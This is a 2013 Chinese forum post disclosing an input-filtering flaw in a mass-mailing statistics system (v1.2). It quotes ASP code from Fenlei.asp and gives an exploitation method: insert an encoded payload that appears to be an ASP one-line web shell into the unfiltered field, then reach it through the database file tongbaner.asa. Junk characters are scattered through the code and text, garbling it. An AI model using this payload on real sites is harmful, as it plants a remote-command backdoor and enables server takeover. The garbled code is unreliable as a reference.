找回密码
 立即注册
查看: 2579|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp ' X# Q% J( S0 `. m/ W
# T' r. @' \8 m3 r( J
IF Request.QueryString("Action")="del" Then : z/ h. O2 E( n  `
ID=Request.QueryString("ID") 8 ?5 @# Y( Y; j& F; j+ o' n, a- i. C
IF Countss ("tui","Fenlei",ID )<>0 then 1 y, E$ D7 j3 }7 M9 `: T4 V9 Q7 h0 P7 J
'略 4 \, [+ c9 }5 x; y* {
IF Request.QueryString("Action")="Add" Then
6 ?  y' }1 n! O9 v# F/ ~0 xTname=Request.Form("Typename") & q5 s- a' f# X- U" N
Set Rs=Server.CreateObject("adodb.Recordset")
1 b0 e# K8 @; T7 z7 ~2 F) [8 t1 \Sql="Select * From Fenlei Order by id Desc " 4 }0 u+ O5 f- _  i6 z
Rs.Open Sql,Conn,1,3 1 T! }! M2 H9 m
Rs.Addnew
: M+ g( Y' x$ T$ _Rs("Typename")=Tname $ F- x7 E, x* U! N, f7 F
'略 8 t( ]6 ?4 s7 r1 ]7 q
Set Rs=Server.CreateObject("adodb.Recordset")
( r5 C5 ~$ L: P' z7 H4 n$ f& xSql="Select * From Fenlei Order by id Desc "
% U0 h3 R# ^: D& {Rs.Open Sql,Conn,1,1 ) }- b6 G, i, a2 s& \7 \
'略   d1 {0 I: c) j1 o7 D! i# k( Y
%>3 @( R; y& ]" A" [! O5 e& W! `8 T
* h! L, u& `" H: f( f
* l; b- {. Q9 e! L, d. b" t
/ V8 Q7 l6 _9 ]
没有过滤,直接写入数据库。7 ?7 x' A$ X, H$ A' Z7 ~

( @% O' f+ c! ], N2 ]6 ^0 k7 f0 m利用方法:
( s  X* I( v: a8 p( q
; A- S: {5 d2 i插入:┼攠數畣整爠煥敵瑳∨≡┩>8 [  @7 Y( j5 F, b, V
' x9 N, T# u1 ~/ A* N5 F& m
0 r8 V* A  C. p: N
连接: http://www.xxx.com/###tongbaner.asa & i! c) q1 d* J7 h6 O
'默认安装文件: $ M( `+ v0 x7 y$ y( i. T
'install.asp  n! S2 M. b) e% h  n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表